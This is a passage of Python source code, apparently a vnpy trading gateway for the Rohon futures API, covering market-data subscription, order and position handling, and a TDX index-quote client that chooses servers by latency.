self.write_log(u'添加Leg1:{}与合成器得映射'.format(leg1_symbol))
combiner_list.append(combiner)
self.tick_combiner_map.update({leg1_symbol: combiner_list})
# 增加映射( leg2 对应的合成器列表映射)
leg2_symbol = setting.get('leg2_symbol')
leg2_exchange = Exchange(setting.get('leg2_exchange'))
combiner_list = self.tick_combiner_map.get(leg2_symbol, [])
if combiner not in combiner_list:
self.write_log(u'添加Leg2:{}与合成器得映射'.format(leg2_symbol))
combiner_list.append(combiner)
self.tick_combiner_map.update({leg2_symbol: combiner_list})
self.write_log(u'订阅leg1:{}'.format(leg1_symbol))
leg1_req = SubscribeRequest(
symbol=leg1_symbol,
exchange=leg1_exchange
)
self.subscribe(leg1_req)
self.write_log(u'订阅leg2:{}'.format(leg2_symbol))
leg2_req = SubscribeRequest(
symbol=leg2_symbol,
exchange=leg2_exchange
)
self.subscribe(leg2_req)
self.subscribed_symbols.add((req.vt_symbol, req.is_bar))
else:
self.write_log(u'{}合成器已经在存在'.format(req.symbol))
return
elif req.exchange == Exchange.SPD:
self.write_error(u'自定义合约{}不在CTP设置中'.format(req.symbol))
# 指数合约,从tdx行情订阅
if req.symbol[-2:] in ['99']:
req.symbol = req.symbol.upper()
if self.tdx_api:
self.write_log(f'使用通达信接口订阅{req.symbol}')
self.tdx_api.subscribe(req)
elif self.rabbit_api:
self.write_log(f'使用RabbitMQ接口订阅{req.symbol}')
self.rabbit_api.subscribe(req)
elif self.tq_api:
self.write_log(f'使用天勤接口订阅{ req.symbol}')
self.tq_api.subscribe(req)
else:
# 上期所、上能源支持五档行情,使用天勤接口
if self.tq_api and req.exchange in [Exchange.SHFE, Exchange.INE]:
self.write_log(f'使用天勤接口订阅{ req.symbol}')
self.tq_api.subscribe(req)
else:
self.write_log(f'使用CTP接口订阅{req.symbol}')
self.md_api.subscribe(req)
# Allow the strategies to start before the connection
self.subscribed_symbols.add((req.vt_symbol, req.is_bar))
if req.is_bar:
self.subscribe_bar(req)
except Exception as ex:
self.write_error(u'订阅合约异常:{},{}'.format(str(ex), traceback.format_exc()))
def subscribe_bar(self, req: SubscribeRequest):
"""订阅1分钟行情"""
vt_symbol = req.vt_symbol
if vt_symbol in self.klines:
return
# 创建1分钟bar产生器
self.write_log(u'创建:{}的一分钟行情产生器'.format(vt_symbol))
bg = BarGenerator(on_bar=self.on_bar)
self.klines.update({vt_symbol: bg})
def send_order(self, req: OrderRequest):
""""""
return self.td_api.send_order(req)
def cancel_order(self, req: CancelRequest):
""""""
self.td_api.cancel_order(req)
return True
def query_account(self):
""""""
self.td_api.query_account()
def query_position(self):
""""""
self.td_api.query_position()
def query_history(self, req: HistoryRequest) -> List[BarData]:
"""查询K线历史"""
if self.tq_api:
return self.tq_api.query_history(req)
else:
return []
def close(self):
""""""
if self.md_api:
self.write_log('断开行情API')
tmp1 = self.md_api
self.md_api = None
tmp1.close()
if self.td_api:
self.write_log('断开交易API')
tmp2 = self.td_api
self.td_api = None
tmp2.close()
if self.tdx_api:
self.write_log(u'断开tdx指数行情API')
tmp3 = self.tdx_api
self.tdx_api = None
tmp3.close()
if self.rabbit_api:
self.write_log(u'断开rabbit MQ tdx指数行情API')
tmp4 = self.rabbit_api
self.rabbit_api = None
tmp4.close()
if self.tq_api:
self.write_log(u'天勤行情API')
tmp5 = self.tq_api
self.tq_api = None
tmp5.close()
def process_timer_event(self, event):
""""""
self.count += 1
if self.count < 2:
return
self.count = 0
func = self.query_functions.pop(0)
func()
self.query_functions.append(func)
def init_query(self):
""""""
self.count = 0
self.query_functions = [self.query_account, self.query_position]
self.event_engine.register(EVENT_TIMER, self.process_timer_event)
def on_custom_tick(self, tick):
"""推送自定义合约行情"""
# 自定义合约行情
for combiner in self.tick_combiner_map.get(tick.symbol, []):
tick = copy(tick)
combiner.on_tick(tick)
class RohonMdApi(MdApi):
""""""
def __init__(self, gateway):
"""Constructor"""
super(RohonMdApi, self).__init__()
self.gateway = gateway
self.gateway_name = gateway.gateway_name
self.reqid = 0
self.connect_status = False
self.login_status = False
self.subscribed = set()
self.userid = ""
self.password = ""
self.brokerid = ""
def onFrontConnected(self):
"""
Callback when front server is connected.
"""
self.gateway.write_log("行情服务器连接成功")
self.login()
self.gateway.status.update({'md_con': True, 'md_con_time': datetime.now().strftime('%Y-%m-%d %H:%M:%S')})
def onFrontDisconnected(self, reason: int):
"""
Callback when front server is disconnected.
"""
self.login_status = False
self.gateway.write_log(f"行情服务器连接断开,原因{reason}")
self.gateway.status.update({'md_con': False, 'md_dis_con_time': datetime.now().strftime('%Y-%m-%d %H:%M:%S')})
def onRspUserLogin(self, data: dict, error: dict, reqid: int, last: bool):
"""
Callback when user is logged in.
"""
if not error["ErrorID"]:
self.login_status = True
self.gateway.write_log("行情服务器登录成功")
for symbol in self.subscribed:
self.subscribeMarketData(symbol)
else:
self.gateway.write_error("行情服务器登录失败", error)
def onRspError(self, error: dict, reqid: int, last: bool):
"""
Callback when error occured.
"""
self.gateway.write_error("行情接口报错", error)
def onRspSubMarketData(self, data: dict, error: dict, reqid: int, last: bool):
""""""
if not error or not error["ErrorID"]:
return
self.gateway.write_error("行情订阅失败", error)
def onRtnDepthMarketData(self, data: dict):
"""
Callback of tick data update.
"""
symbol = data["InstrumentID"]
exchange = symbol_exchange_map.get(symbol, "")
if not exchange:
return
# 取当前时间
dt = datetime.now()
s_date = dt.strftime('%Y-%m-%d')
timestamp = f"{s_date} {data['UpdateTime']}.{int(data['UpdateMillisec'] / 100)}"
dt = datetime.strptime(timestamp, "%Y-%m-%d %H:%M:%S.%f")
# 不处理开盘前的tick数据
if dt.hour in [8, 20] and dt.minute < 59:
return
if exchange is Exchange.CFFEX and dt.hour == 9 and dt.minute < 14:
return
tick = TickData(
symbol=symbol,
exchange=exchange,
datetime=dt,
date=s_date,
time=dt.strftime('%H:%M:%S.%f'),
trading_day=get_trading_date(dt),
name=symbol_name_map[symbol],
volume=data["Volume"],
open_interest=data["OpenInterest"],
last_price=data["LastPrice"],
limit_up=data["UpperLimitPrice"],
limit_down=data["LowerLimitPrice"],
open_price=adjust_price(data["OpenPrice"]),
high_price=adjust_price(data["HighestPrice"]),
low_price=adjust_price(data["LowestPrice"]),
pre_close=adjust_price(data["PreClosePrice"]),
bid_price_1=adjust_price(data["BidPrice1"]),
ask_price_1=adjust_price(data["AskPrice1"]),
bid_volume_1=data["BidVolume1"],
ask_volume_1=data["AskVolume1"],
gateway_name=self.gateway_name
)
# 处理一下标准套利合约的last_price
if '&' in symbol:
tick.last_price = (tick.ask_price_1 + tick.bid_price_1)/2
if data["BidVolume2"] or data["AskVolume2"]:
tick.bid_price_2 = adjust_price(data["BidPrice2"])
tick.bid_price_3 = adjust_price(data["BidPrice3"])
tick.bid_price_4 = adjust_price(data["BidPrice4"])
tick.bid_price_5 = adjust_price(data["BidPrice5"])
tick.ask_price_2 = adjust_price(data["AskPrice2"])
tick.ask_price_3 = adjust_price(data["AskPrice3"])
tick.ask_price_4 = adjust_price(data["AskPrice4"])
tick.ask_price_5 = adjust_price(data["AskPrice5"])
tick.bid_volume_2 = adjust_price(data["BidVolume2"])
tick.bid_volume_3 = adjust_price(data["BidVolume3"])
tick.bid_volume_4 = adjust_price(data["BidVolume4"])
tick.bid_volume_5 = adjust_price(data["BidVolume5"])
tick.ask_volume_2 = adjust_price(data["AskVolume2"])
tick.ask_volume_3 = adjust_price(data["AskVolume3"])
tick.ask_volume_4 = adjust_price(data["AskVolume4"])
tick.ask_volume_5 = adjust_price(data["AskVolume5"])
self.gateway.on_tick(tick)
self.gateway.on_custom_tick(tick)
def connect(self, address: str, userid: str, password: str, brokerid: int):
"""
Start connection to server.
"""
self.userid = userid
self.password = password
self.brokerid = brokerid
# If not connected, then start connection first.
if not self.connect_status:
path = get_folder_path(self.gateway_name.lower())
self.createFtdcMdApi(str(path) + "\\Md")
self.registerFront(address)
self.init()
self.connect_status = True
# If already connected, then login immediately.
elif not self.login_status:
self.login()
def login(self):
"""
Login onto server.
"""
req = {
"UserID": self.userid,
"Password": self.password,
"BrokerID": self.brokerid
}
self.reqid += 1
self.reqUserLogin(req, self.reqid)
def subscribe(self, req: SubscribeRequest):
"""
Subscribe to tick data update.
"""
if self.login_status:
self.gateway.write_log(f'订阅:{req.exchange} {req.symbol}')
self.subscribeMarketData(req.symbol)
self.subscribed.add(req.symbol)
def close(self):
"""
Close the connection.
"""
if self.connect_status:
self.exit()
class RohonTdApi(TdApi):
""""""
def __init__(self, gateway):
"""Constructor"""
super(RohonTdApi, self).__init__()
self.gateway = gateway
self.gateway_name = gateway.gateway_name
self.reqid = 0
self.order_ref = 0
self.connect_status = False
self.login_status = False
self.auth_staus = False
self.login_failed = False
self.userid = ""
self.password = ""
self.brokerid = ""
self.auth_code = ""
self.appid = ""
self.product_info = ""
self.frontid = 0
self.sessionid = 0
self.order_data = []
self.trade_data = []
self.positions = {}
self.sysid_orderid_map = {}
self.future_contract_changed = False
self.accountid = self.userid
def onFrontConnected(self):
""""""
self.gateway.write_log("交易服务器连接成功")
if self.auth_code:
self.authenticate()
else:
self.login()
self.gateway.status.update({'td_con': True, 'td_con_time': datetime.now().strftime('%Y-%m-%d %H:%M:%S')})
def onFrontDisconnected(self, reason: int):
""""""
self.login_status = False
self.gateway.write_log(f"交易服务器连接断开,原因{reason}")
self.gateway.status.update({'td_con': True, 'td_dis_con_time': datetime.now().strftime('%Y-%m-%d %H:%M:%S')})
def onRspAuthenticate(self, data: dict, error: dict, reqid: int, last: bool):
""""""
if not error['ErrorID']:
self.auth_staus = True
self.gateway.write_log("交易服务器授权验证成功")
self.login()
else:
self.gateway.write_error("交易服务器授权验证失败", error)
def onRspUserLogin(self, data: dict, error: dict, reqid: int, last: bool):
""""""
if not error["ErrorID"]:
self.frontid = data["FrontID"]
self.sessionid = data["SessionID"]
self.login_status = True
self.gateway.write_log("交易服务器登录成功")
# Confirm settlement
req = {
"BrokerID": self.brokerid,
"InvestorID": self.userid
}
self.reqid += 1
self.reqSettlementInfoConfirm(req, self.reqid)
else:
self.login_failed = True
self.gateway.write_error("交易服务器登录失败", error)
def onRspOrderInsert(self, data: dict, error: dict, reqid: int, last: bool):
""""""
order_ref = data["OrderRef"]
orderid = f"{self.frontid}_{self.sessionid}_{order_ref}"
symbol = data["InstrumentID"]
exchange = symbol_exchange_map[symbol]
order_type = OrderType.LIMIT
if data["OrderPriceType"] == THOST_FTDC_OPT_LimitPrice and data["TimeCondition"] == THOST_FTDC_TC_IOC:
if data["VolumeCondition"] == THOST_FTDC_VC_AV:
order_type = OrderType.FAK
elif data["VolumeCondition"] == THOST_FTDC_VC_CV:
order_type = OrderType.FOK
if data["OrderPriceType"] == THOST_FTDC_OPT_AnyPrice:
order_type = OrderType.MARKET
order = OrderData(
symbol=symbol,
exchange=exchange,
accountid=self.accountid,
orderid=orderid,
type=order_type,
direction=DIRECTION_ROHON2VT[data["Direction"]],
offset=OFFSET_ROHON2VT.get(data["CombOffsetFlag"], Offset.NONE),
price=data["LimitPrice"],
volume=data["VolumeTotalOriginal"],
status=Status.REJECTED,
gateway_name=self.gateway_name
)
self.gateway.on_order(order)
self.gateway.write_error("交易委托失败", error)
def onRspOrderAction(self, data: dict, error: dict, reqid: int, last: bool):
""""""
self.gateway.write_error("交易撤单失败", error)
def onRspQueryMaxOrderVolume(self, data: dict, error: dict, reqid: int, last: bool):
""""""
pass
def onRspSettlementInfoConfirm(self, data: dict, error: dict, reqid: int, last: bool):
"""
Callback of settlment info confimation.
"""
self.gateway.write_log("结算信息确认成功")
while True:
self.reqid += 1
n = self.reqQryInstrument({}, self.reqid)
if not n:
break
else:
sleep(1)
def onRspQryInvestorPosition(self, data: dict, error: dict, reqid: int, last: bool):
""""""
if not data:
return
if data.get("InstrumentID") not in symbol_exchange_map:
return
# Get buffered position object
key = f"{data['InstrumentID'], data['PosiDirection']}"
position = self.positions.get(key, None)
if not position:
position = PositionData(
accountid=self.accountid,
symbol=data["InstrumentID"],
exchange=symbol_exchange_map[data["InstrumentID"]],
direction=DIRECTION_ROHON2VT[data["PosiDirection"]],
gateway_name=self.gateway_name
)
self.positions[key] = position
# For SHFE position data update
if position.exchange in [Exchange.SHFE, Exchange.INE]:
if data["YdPosition"] and not data["TodayPosition"]:
position.yd_volume = data["Position"]
# For other exchange position data update
else:
position.yd_volume = data["Position"] - data["TodayPosition"]
# Get contract size (spread contract has no size value)
size = symbol_size_map.get(position.symbol, 0)
# Calculate previous position cost
cost = position.price * position.volume * size
# Update new position volume
position.volume += data["Position"]
position.pnl += data["PositionProfit"]
# Calculate average position price
if position.volume and size:
cost += data["PositionCost"]
position.price = cost / (position.volume * size)
# Get frozen volume
if position.direction == Direction.LONG:
position.frozen += data["ShortFrozen"]
else:
position.frozen += data["LongFrozen"]
if last:
for position in self.positions.values():
self.gateway.on_position(position)
self.positions.clear()
def onRspQryTradingAccount(self, data: dict, error: dict, reqid: int, last: bool):
""""""
if self.gateway.debug:
print(f'onRspQryTradingAccount')
if "AccountID" not in data:
return
if len(self.accountid)== 0:
self.accountid = data['AccountID']
account = AccountData(
accountid=data["AccountID"],
pre_balance=round(float(data['PreBalance']), 7),
balance=round(float(data["Balance"]), 7),
frozen=round(data["FrozenMargin"] + data["FrozenCash"] + data["FrozenCommission"], 7),
gateway_name=self.gateway_name
)
account.available = round(float(data["Available"]), 7)
account.commission = round(float(data['Commission']), 7)
account.margin = round(float(data['CurrMargin']), 7)
account.close_profit = round(float(data['CloseProfit']), 7)
account.holding_profit = round(float(data['PositionProfit']), 7)
account.trading_day = str(data['TradingDay'])
if '-' not in account.trading_day and len(account.trading_day) == 8:
account.trading_day = '-'.join(
[
account.trading_day[0:4],
account.trading_day[4:6],
account.trading_day[6:8]
]
)
self.gateway.on_account(account)
def onRspQryInstrument(self, data: dict, error: dict, reqid: int, last: bool):
"""
Callback of instrument query.
"""
#if self.gateway.debug:
# print(f'onRspQryInstrument')
product = PRODUCT_ROHON2VT.get(data["ProductClass"], None)
if product:
contract = ContractData(
symbol=data["InstrumentID"],
exchange=EXCHANGE_ROHON2VT[data["ExchangeID"]],
name=data["InstrumentName"],
product=product,
size=data["VolumeMultiple"],
pricetick=data["PriceTick"],
gateway_name=self.gateway_name
)
# 保证金费率
contract.margin_rate = max(data.get('LongMarginRatio', 0), data.get('ShortMarginRatio', 0))
if contract.margin_rate == 0:
contract.margin_rate = 0.1
# For option only
if contract.product == Product.OPTION:
# Remove C/P suffix of CZCE option product name
if contract.exchange == Exchange.CZCE:
contract.option_portfolio = data["ProductID"][:-1]
else:
contract.option_portfolio = data["ProductID"]
contract.option_underlying = data["UnderlyingInstrID"],
contract.option_type = OPTIONTYPE_ROHON2VT.get(data["OptionsType"], None),
contract.option_strike = data["StrikePrice"],
contract.option_index = str(data["StrikePrice"])
contract.option_expiry = datetime.strptime(data["ExpireDate"], "%Y%m%d"),
self.gateway.on_contract(contract)
symbol_exchange_map[contract.symbol] = contract.exchange
symbol_name_map[contract.symbol] = contract.name
symbol_size_map[contract.symbol] = contract.size
if contract.product == Product.FUTURES:
# 生成指数合约信息
underlying_symbol = data["ProductID"] # 短合约名称
underlying_symbol = underlying_symbol.upper()
# 只推送普通合约的指数
if len(underlying_symbol) <= 2:
idx_contract = index_contracts.get(underlying_symbol, None)
if idx_contract is None:
idx_contract = deepcopy(contract)
idx_contract.symbol = '{}99'.format(underlying_symbol)
idx_contract.name = u'{}指数'.format(underlying_symbol)
idx_contract.vt_symbol = f'{idx_contract.symbol}.{idx_contract.exchange.value}'
self.gateway.on_contract(idx_contract)
# 获取data/tdx/future_contracts.json中的合约记录
future_contract = future_contracts.get(underlying_symbol, {})
mi_contract_symbol = future_contract.get('mi_symbol', '')
margin_rate = float(future_contract.get('margin_rate', 0))
mi_margin_rate = round(idx_contract.margin_rate, 4)
if mi_contract_symbol == contract.symbol:
if margin_rate != mi_margin_rate:
self.gateway.write_log(
f"{underlying_symbol}合约主力{mi_contract_symbol} 保证金{margin_rate}=>{mi_margin_rate}")
future_contract.update({'margin_rate': mi_margin_rate})
future_contract.update({'symbol_size': idx_contract.size})
future_contract.update({'price_tick': idx_contract.pricetick})
future_contracts.update({underlying_symbol: future_contract})
self.future_contract_changed = True
index_contracts.update({underlying_symbol: idx_contract})
if last:
self.gateway.write_log("合约信息查询成功")
if self.future_contract_changed:
self.gateway.write_log('更新vnpy/data/tdx/future_contracts.json')
save_future_contracts(future_contracts)
for data in self.order_data:
self.onRtnOrder(data)
self.order_data.clear()
for data in self.trade_data:
self.onRtnTrade(data)
self.trade_data.clear()
def onRtnOrder(self, data: dict):
"""
Callback of order status update.
"""
if self.gateway.debug:
print(f'onRtnOrder')
symbol = data["InstrumentID"]
exchange = symbol_exchange_map.get(symbol, "")
if not exchange:
self.order_data.append(data)
return
frontid = data["FrontID"]
sessionid = data["SessionID"]
order_ref = data["OrderRef"]
orderid = f"{frontid}_{sessionid}_{order_ref}"
order_type = OrderType.LIMIT
if data["OrderPriceType"] == THOST_FTDC_OPT_LimitPrice and data["TimeCondition"] == THOST_FTDC_TC_IOC:
if data["VolumeCondition"] == THOST_FTDC_VC_AV:
order_type = OrderType.FAK
elif data["VolumeCondition"] == THOST_FTDC_VC_CV:
order_type = OrderType.FOK
if data["OrderPriceType"] == THOST_FTDC_OPT_AnyPrice:
order_type = OrderType.MARKET
order = OrderData(
accountid=self.accountid,
symbol=symbol,
exchange=exchange,
orderid=orderid,
sys_orderid=data.get('OrderSysID', orderid),
type=order_type,
direction=DIRECTION_ROHON2VT[data["Direction"]],
offset=OFFSET_ROHON2VT[data["CombOffsetFlag"]],
price=data["LimitPrice"],
volume=data["VolumeTotalOriginal"],
traded=data["VolumeTraded"],
status=STATUS_ROHON2VT[data["OrderStatus"]],
time=data["InsertTime"],
gateway_name=self.gateway_name
)
self.gateway.on_order(order)
self.sysid_orderid_map[data["OrderSysID"]] = orderid
def onRtnTrade(self, data: dict):
"""
Callback of trade status update.
"""
if self.gateway.debug:
print(f'onRtnTrade')
symbol = data["InstrumentID"]
exchange = symbol_exchange_map.get(symbol, "")
if not exchange:
self.trade_data.append(data)
return
orderid = self.sysid_orderid_map[data["OrderSysID"]]
trade_date = data['TradeDate']
if '-' not in trade_date and len(trade_date) == 8:
trade_date = trade_date[0:4] + '-' + trade_date[4:6] + '-' + trade_date[6:8]
trade_time = data['TradeTime']
trade_datetime = datetime.strptime(f'{trade_date} {trade_time}', '%Y-%m-%d %H:%M:%S')
tradeid = data["TradeID"]
trade = TradeData(
accountid=self.accountid,
symbol=symbol,
exchange=exchange,
orderid=orderid,
sys_orderid=data.get("OrderSysID", orderid),
tradeid=tradeid.replace(' ',''),
direction=DIRECTION_ROHON2VT[data["Direction"]],
offset=OFFSET_ROHON2VT[data["OffsetFlag"]],
price=data["Price"],
volume=data["Volume"],
time=data["TradeTime"],
datetime=trade_datetime,
gateway_name=self.gateway_name
)
self.gateway.on_trade(trade)
def connect(
self,
address: str,
userid: str,
password: str,
brokerid: int,
auth_code: str,
appid: str,
product_info
):
"""
Start connection to server.
"""
self.userid = userid
self.password = password
self.brokerid = brokerid
self.auth_code = auth_code
self.appid = appid
self.product_info = product_info
if not self.connect_status:
path = get_folder_path(self.gateway_name.lower())
self.createFtdcTraderApi(str(path) + "\\Td")
self.subscribePrivateTopic(0)
self.subscribePublicTopic(0)
self.registerFront(address)
self.init()
self.connect_status = True
else:
self.authenticate()
def authenticate(self):
"""
Authenticate with auth_code and appid.
"""
req = {
"UserID": self.userid,
"BrokerID": self.brokerid,
"AuthCode": self.auth_code,
"AppID": self.appid
}
if self.product_info:
req["UserProductInfo"] = self.product_info
self.reqid += 1
self.reqAuthenticate(req, self.reqid)
def login(self):
"""
Login onto server.
"""
if self.login_failed:
return
req = {
"UserID": self.userid,
"Password": self.password,
"BrokerID": self.brokerid,
"AppID": self.appid
}
self.accountid = copy(self.userid)
if self.product_info:
req["UserProductInfo"] = self.product_info
self.reqid += 1
self.reqUserLogin(req, self.reqid)
def send_order(self, req: OrderRequest):
"""
Send new order.
"""
if self.gateway.debug:
print(f'send_order:{req.__dict__}')
if req.offset not in OFFSET_VT2ROHON:
self.gateway.write_log("请选择开平方向")
return ""
self.order_ref += 1
rohon_req = {
"InstrumentID": req.symbol,
"ExchangeID": req.exchange.value,
"LimitPrice": req.price,
"VolumeTotalOriginal": int(req.volume),
"OrderPriceType": ORDERTYPE_VT2ROHON.get(req.type, ""),
"Direction": DIRECTION_VT2ROHON.get(req.direction, ""),
"CombOffsetFlag": OFFSET_VT2ROHON.get(req.offset, ""),
"OrderRef": str(self.order_ref),
"InvestorID": self.userid,
"UserID": self.userid,
"BrokerID": self.brokerid,
"CombHedgeFlag": THOST_FTDC_HF_Speculation,
"ContingentCondition": THOST_FTDC_CC_Immediately,
"ForceCloseReason": THOST_FTDC_FCC_NotForceClose,
"IsAutoSuspend": 0,
"TimeCondition": THOST_FTDC_TC_GFD,
"VolumeCondition": THOST_FTDC_VC_AV,
"MinVolume": 1
}
if req.type == OrderType.FAK:
rohon_req["OrderPriceType"] = THOST_FTDC_OPT_LimitPrice
rohon_req["TimeCondition"] = THOST_FTDC_TC_IOC
rohon_req["VolumeCondition"] = THOST_FTDC_VC_AV
elif req.type == OrderType.FOK:
rohon_req["OrderPriceType"] = THOST_FTDC_OPT_LimitPrice
rohon_req["TimeCondition"] = THOST_FTDC_TC_IOC
rohon_req["VolumeCondition"] = THOST_FTDC_VC_CV
self.reqid += 1
self.reqOrderInsert(rohon_req, self.reqid)
orderid = f"{self.frontid}_{self.sessionid}_{self.order_ref}"
order = req.create_order_data(orderid, self.gateway_name)
order.accountid = self.accountid
order.vt_accountid = f"{self.gateway_name}.{self.accountid}"
self.gateway.on_order(order)
return order.vt_orderid
def cancel_order(self, req: CancelRequest):
"""
Cancel existing order.
"""
frontid, sessionid, order_ref = req.orderid.split("_")
rohon_req = {
"InstrumentID": req.symbol,
"ExchangeID": req.exchange.value,
"OrderRef": order_ref,
"FrontID": int(frontid),
"SessionID": int(sessionid),
"ActionFlag": THOST_FTDC_AF_Delete,
"BrokerID": self.brokerid,
"InvestorID": self.userid
}
self.reqid += 1
self.reqOrderAction(rohon_req, self.reqid)
def query_account(self):
"""
Query account balance data.
"""
if self.gateway.debug:
print(f'query_account')
self.reqid += 1
self.reqQryTradingAccount({}, self.reqid)
def query_position(self):
"""
Query position holding data.
"""
if self.gateway.debug:
print(f'query_position')
if not symbol_exchange_map:
return
req = {
"BrokerID": self.brokerid,
"InvestorID": self.userid
}
self.reqid += 1
self.reqQryInvestorPosition(req, self.reqid)
def close(self):
""""""
if self.gateway.debug:
print(f'td close')
if self.connect_status:
self.exit()
def adjust_price(price: float) -> float:
""""""
if price == MAX_FLOAT:
price = 0
return price
class TdxMdApi():
"""
通达信数据行情API实现
订阅的指数行情,更新合约的数据
"""
def __init__(self, gateway):
self.gateway = gateway # gateway对象
self.gateway_name = gateway.gateway_name # gateway对象名称
self.req_interval = 0.5 # 操作请求间隔500毫秒
self.req_id = 0 # 操作请求编号
self.connection_status = False # 连接状态
self.symbol_exchange_dict = {} # tdx合约与vn交易所的字典
self.symbol_market_dict = {} # tdx合约与tdx市场的字典
self.symbol_vn_dict = {} # tdx合约与vt_symbol的对应
self.symbol_tick_dict = {} # tdx合约与最后一个Tick得字典
self.registered_symbol_set = set()
self.thread = None # 查询线程
self.ip_list = TDX_FUTURE_HOSTS
# 调出
self.best_ip = {} # 最佳IP地址和端口
self.api = None # API 的连接会话对象
self.last_tick_dt = datetime.now() # 记录该会话对象的最后一个tick时间
self.instrument_count = 50000
self.has_qry_instrument = False
# ----------------------------------------------------------------------
def ping(self, ip, port=7709):
"""
ping行情服务器
:param ip:
:param port:
:param type_:
:return:
"""
apix = TdxExHq_API()
__time1 = datetime.now()
try:
with apix.connect(ip, port):
if apix.get_instrument_count() > 10000:
_timestamp = (datetime.now() - __time1).total_seconds() * 1000
self.gateway.write_log('服务器{}:{},耗时:{}ms'.format(ip, port, _timestamp))
return _timestamp
else:
self.gateway.write_log(u'该服务器IP {}无响应.'.format(ip))
return timedelta(seconds=10).total_seconds() * 1000
except Exception as ex:
self.gateway.write_log(u'tdx ping服务器{},异常的响应{}'.format(ip, str(ex)))
return timedelta(seconds=10).total_seconds() * 1000
def sort_ip_speed(self):
"""
对所有服务器进行速度排序
:return:
"""
speed_result = []
for x in self.ip_list:
speed = self.ping(x['ip'], x['port'])
x.update({'speed': speed})
speed_result.append(copy(x))
# 更新服务器,按照速度排序
speed_result = sorted(speed_result, key=lambda s: s['speed'])
self.gateway.write_log(u'服务器访问速度排序:{}'.format(speed_result))
return speed_result
# ----------------------------------------------------------------------
def select_best_ip(self, exclude_ip: str = None):
"""
选择行情服务器
:param: exclude_ip, 排除的ip地址
:return:
"""
self.gateway.write_log(u'选择通达信行情服务器')
ip_list = self.sort_ip_speed()
valid_ip_list = [x for x in ip_list if x.get('speed', 10000) < 10000 and x.get('ip') != exclude_ip]
if len(valid_ip_list) == 0:
self.gateway.write_error(u'未能找到合适速度得行情服务器')
return None
best_future_ip = valid_ip_list[0]
save_cache_json(best_future_ip, TDX_FUTURE_CONFIG)
return best_future_ip
def connect(self, is_reconnect=False):
"""
连接通达讯行情服务器
:param is_reconnect:是否重连
:return:
"""
# 创建api连接对象实例
try:
if self.api is None or not self.connection_status:
self.gateway.write_log(u'开始连接通达信行情服务器')
self.api = TdxExHq_API(heartbeat=True, auto_retry=True, raise_exception=True)
# 选取最佳服务器
if is_reconnect or len(self.best_ip) == 0:
self.best_ip = get_cache_json(TDX_FUTURE_CONFIG)
if len(self.best_ip) == 0:
self.best_ip = self.select_best_ip()
self.api.connect(self.best_ip['ip'], self.best_ip['port'])
# 尝试获取市场合约统计
c = self.api.get_instrument_count()
if c < 10:
err_msg = u'该服务器IP {}/{}无响应'.format(self.best_ip['ip'], self.best_ip['port'])
self.gateway.write_error(err_msg)
else:
self.gateway.write_log(u'创建tdx连接, IP: {}/{}'.format(self.best_ip['ip'], self.best_ip['port']))
self.connection_status = True
self.gateway.status.update(
{'tdx_con': True, 'tdx_con_time': datetime.now().strftime('%Y-%m-%d %H:%M%S')})
self.thread = Thread(target=self.run)
self.thread.start()
except Exception as ex:
self.gateway.write_log(u'连接服务器tdx异常:{},{}'.format(str(ex), traceback.format_exc()))
return
def close(self):
"""退出API"""
self.gateway.write_log(u'退出tdx API')
self.connection_status = False
if self.thread:
self.thread.join()
# ----------------------------------------------------------------------
def subscribe(self, subscribeReq):
"""订阅合约"""
# 这里的设计是,如果尚未登录就调用了订阅方法
# 则先保存订阅请求,登录完成后会自动订阅
vn_symbol = str(subscribeReq.symbol)
vn_symbol = vn_symbol.upper()
self.gateway.write_log(u'通达信行情订阅 {}'.format(str(vn_symbol)))
if vn_symbol[-2:] != '99':
self.gateway.write_log(u'{}不是指数合约,不能订阅'.format(vn_symbol))
return
tdx_symbol = vn_symbol[0:-2] + 'L9'
tdx_symbol = tdx_symbol.upper()
self.gateway.write_log(u'{}=>{}'.format(vn_symbol, tdx_symbol))
self.symbol_vn_dict[tdx_symbol] = vn_symbol
if tdx_symbol not in self.registered_symbol_set:
self.registered_symbol_set.add(tdx_symbol)
self.check_status()
def check_status(self):
# self.write_log(u'检查tdx接口状态')
if len(self.registered_symbol_set) == 0:
return
# 若还没有启动连接,就启动连接
over_time = (datetime.now() - self.last_tick_dt).total_seconds() > 60
if not self.connection_status or self.api is None or over_time:
self.gateway.write_log(u'tdx还没有启动连接,就启动连接')
self.close()
self.thread = None
self.connect(is_reconnect=True)
def qry_instrument(self):
"""
查询/更新合约信息
:return:
"""
if not self.connection_status:
self.gateway.write_error(u'tdx连接状态为断开,不能查询和更新合约信息')
return
if self.has_qry_instrument:
self.gateway.write_error(u'已经查询过一次合约信息,不再查询')
return
# 取得所有的合约信息
num = self.api.get_instrument_count()
if not isinstance(num, int):
return
all_contacts = sum(
[self.api.get_instrument_info((int(num / 500) - i) * 500, 500) for i in range(int(num / 500) + 1)], [])
# [{"category":category,"market": int,"code":sting,"name":string,"desc":string},{}]
# 对所有合约处理,更新字典 指数合约-tdx市场,指数合约-交易所
for tdx_contract in all_contacts:
tdx_symbol = tdx_contract.get('code', None)
if tdx_symbol is None or tdx_symbol[-2:] not in ['L9']:
continue
tdx_market_id = tdx_contract.get('market')
self.symbol_market_dict[tdx_symbol] = tdx_market_id
if tdx_market_id == 47: # 中金所
self.symbol_exchange_dict[tdx_symbol] = Exchange.CFFEX
elif tdx_market_id == 28: # 郑商所
self.symbol_exchange_dict[tdx_symbol] = Exchange.CZCE
elif tdx_market_id == 29: # 大商所
self.symbol_exchange_dict[tdx_symbol] = Exchange.DCE
elif tdx_market_id == 30: # 上期所+能源
self.symbol_exchange_dict[tdx_symbol] = Exchange.SHFE
elif tdx_market_id == 60: # 主力合约
self.gateway.write_log(u'主力合约:{}'.format(tdx_contract))
self.has_qry_instrument = True
def run(self):
# 直接查询板块
try:
last_dt = datetime.now()
self.gateway.write_log(u'开始运行tdx查询指数行情线程,{}'.format(last_dt))
while self.connection_status:
if len(self.registered_symbol_set) > 0:
try:
self.process_index_req()
except BrokenPipeError as bex:
self.gateway.write_error(u'BrokenPipeError{},重试重连tdx[{}]'.format(str(bex), 0))
self.connect(is_reconnect=True)
sleep(5)
break
except Exception as ex:
self.gateway.write_error(u'tdx exception:{},{}'.format(str(ex), traceback.format_exc()))
self.gateway.write_error(u'重试重连tdx')
self.connect(is_reconnect=True)
sleep(self.req_interval)
dt = datetime.now()
if last_dt.minute != dt.minute:
self.gateway.write_log(
'tdx check point. {}, process symbols:{}'.format(dt, self.registered_symbol_set))
last_dt = dt
except Exception as ex:
